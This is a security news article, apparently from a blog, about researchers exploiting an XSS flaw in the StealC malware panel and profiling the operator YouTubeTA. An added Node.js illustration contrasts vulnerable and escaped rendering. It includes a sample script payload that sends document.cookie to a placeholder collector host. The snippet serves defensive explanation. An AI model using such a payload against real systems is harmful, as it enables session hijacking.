
Researchers Spy on Threat Actor Operations Due to Security Bug in StealC Malware Panel

  • Jan 19

Key Findings


  • Researchers at CyberArk discovered a cross-site scripting (XSS) vulnerability in the web-based control panel used by operators of the StealC information stealer malware.

  • By exploiting the flaw, researchers were able to collect system fingerprints, monitor active sessions, and steal cookies from the infrastructure designed for cookie theft.

  • StealC is a malware-as-a-service (MaaS) offering that emerged in January 2023, leveraging YouTube as a primary distribution mechanism to disguise the malware as cracks for popular software.

  • The source code of the malware's administration panel was later leaked, giving researchers an opportunity to identify characteristics of the operators' computers and to retrieve their active session cookies.

  • A threat actor known as YouTubeTA was found to have extensively used YouTube to distribute StealC by advertising cracked versions of Adobe software, amassing over 5,000 logs that contained 390,000 stolen passwords and more than 30 million stolen cookies.

  • The research underscores the impact of the MaaS ecosystem, which empowers threat actors to mount attacks at scale while also exposing them to security risks that legitimate businesses face.


Background


StealC is an information stealer that first emerged in January 2023 under a malware-as-a-service (MaaS) model. Its customers have used YouTube as a primary distribution mechanism, disguising the malicious program as cracks for popular software, a pattern of abuse that has been dubbed the YouTube Ghost Network. Over the past year, the stealer has also been observed being propagated via rogue Blender Foundation files and through a social engineering tactic known as FileFix.


Meanwhile, StealC received updates of its own: Telegram bot integration for notifications, enhanced payload delivery, and a redesigned panel, released together as StealC V2. Weeks later, the source code for the malware's administration panel was leaked, giving the research community an opportunity to identify characteristics of the operators' computers, such as general location indicators and hardware details, and to retrieve active session cookies from the operators' own machines.


Vulnerability Discovery


Researchers at CyberArk discovered a cross-site scripting (XSS) vulnerability in the web-based control panel used by operators of the StealC malware. By exploiting this flaw, they were able to collect system fingerprints, monitor active sessions, and steal cookies from the very infrastructure designed to steal them.


The researchers noted the irony of an operation built around large-scale cookie theft failing to protect its own session cookies from a textbook attack. The exact details of the XSS flaw have not been disclosed, both to avoid helping the StealC developers plug the hole and to avoid assisting copycats who might use the leaked panel to start their own stealer MaaS offerings.
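As an added illustration, not CyberArk's finding and not code from the StealC panel (whose exact flaw remains undisclosed), the following Node.js snippet shows the bug class a stealer panel is exposed to: every field in a "log" is written by the infected host, so a machine that deliberately runs the stealer can plant a script payload that executes in the operator's browser when the panel renders it without output encoding. The field names, the placeholder collector URL research.example, and the cookie-attribute check are assumptions made for this example; the HttpOnly check reflects the general rule that XSS-based session theft depends on the session cookie being readable by script, not a statement about how the StealC panel actually set its cookies.

```javascript
// Added illustration (not StealC panel code, whose actual XSS is undisclosed):
// the stored-XSS bug class a stealer log panel can carry, beside its hardened form.
// A "log" is whatever the infected host reported, so every field is attacker-controlled
// from the panel's point of view; here a researcher's test machine plays the "attacker".

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode untrusted text for an HTML text or double-quoted attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Vulnerable renderer: interpolates bot-reported fields straight into markup.
function renderLogRowVulnerable(log) {
  return `<tr><td>${log.hostname}</td><td>${log.username}</td><td>${log.ip}</td></tr>`;
}

// Hardened renderer: identical markup, but every untrusted field is encoded first.
function renderLogRowSafe(log) {
  return `<tr><td>${escapeHtml(log.hostname)}</td>` +
         `<td>${escapeHtml(log.username)}</td><td>${escapeHtml(log.ip)}</td></tr>`;
}

// Constructed sample log (assumed field names): the hostname carries a payload that,
// if rendered raw, runs in the operator's browser and posts document.cookie to a
// collector URL. research.example is a placeholder, not a real endpoint.
const CONSTRUCTED_LOG = {
  hostname: 'DESKTOP-01<script>fetch("https://research.example/c?d=" +' +
            'encodeURIComponent(document.cookie))</script>',
  username: 'user',
  ip: '203.0.113.10',
};

// Crude check used below: does the rendered HTML still contain a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Server-side companion: an XSS only yields a usable session if the cookie is
// readable by script. Inspects a Set-Cookie header for the attributes that make
// XSS-to-session-theft harder (HttpOnly blocks document.cookie access).
function sessionCookieIsHardened(setCookieHeader) {
  const attrs = setCookieHeader.split(';').slice(1).map((a) => a.trim().toLowerCase());
  return attrs.includes('httponly') &&
         attrs.includes('secure') &&
         attrs.some((a) => a.startsWith('samesite='));
}

// Summarise both renderers and both cookie policies on the constructed inputs.
function demo() {
  return {
    vulnerableRowExecutesScript: containsScriptTag(renderLogRowVulnerable(CONSTRUCTED_LOG)),
    safeRowExecutesScript: containsScriptTag(renderLogRowSafe(CONSTRUCTED_LOG)),
    weakCookie: sessionCookieIsHardened('sid=abc123; Path=/'),
    hardenedCookie: sessionCookieIsHardened('sid=abc123; Path=/; HttpOnly; Secure; SameSite=Lax'),
  };
}

console.log(demo());
```

Run with node: the vulnerable renderer keeps the planted script live while the hardened one neutralises it, and the cookie check shows the second defence a panel would need, since an encoded template and an HttpOnly session cookie each independently break the chain the researchers describe.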


Threat Actor Analysis


The research also shed light on a StealC customer named YouTubeTA (short for "YouTube Threat Actor"), who has extensively used Google's video sharing platform to distribute the stealer by advertising cracked versions of Adobe Photoshop and Adobe After Effects, amassing over 5,000 logs that contained 390,000 stolen passwords and more than 30 million stolen cookies.


Most of the cookies are assessed to be tracking cookies and other non-sensitive cookies. The researchers suspect that these efforts nonetheless enabled the threat actor to seize control of legitimate YouTube accounts and use them to promote further cracked software, creating a self-perpetuating propagation mechanism.


Further analysis determined that the panel lets operators create multiple users and distinguishes admin users from regular users. YouTubeTA's panel was found to have a single admin user, whose machine ran on an Apple M3 processor with English and Russian language settings.


In an operational security lapse around mid-July 2025, the threat actor connected to the StealC panel without going through a virtual private network (VPN), exposing a real IP address associated with a Ukrainian provider called TRK Cable TV. Taken together with the language settings, this suggests that YouTubeTA is a lone-wolf actor operating from an Eastern European country where Russian is commonly spoken.


Conclusion


The research underscores the double-edged impact of the MaaS ecosystem: it lets threat actors mount attacks at scale within a short span of time, but it also exposes them to the same application-security risks that legitimate businesses deal with.


The findings indicate that the StealC developers were weak on both session cookie protection and panel code quality, which let researchers gather a great deal of data about the panel's customers. The researchers suggest that, if the same holds for other malware vendors, similar flaws could provide valuable insights and potentially reveal the identities of many malware operators.


Sources


  • https://thehackernews.com/2026/01/security-bug-in-stealc-malware-panel.html

  • https://securityonline.info/spy-vs-spy-predator-malware-now-hunts-the-researchers/

  • https://x.com/TheCyberSecHub/status/2013150748113248757

  • https://www.cypro.se/2026/01/19/security-bug-in-stealc-malware-panel-let-researchers-spy-on-threat-actor-operations/

© 2025 by Explain IT Again.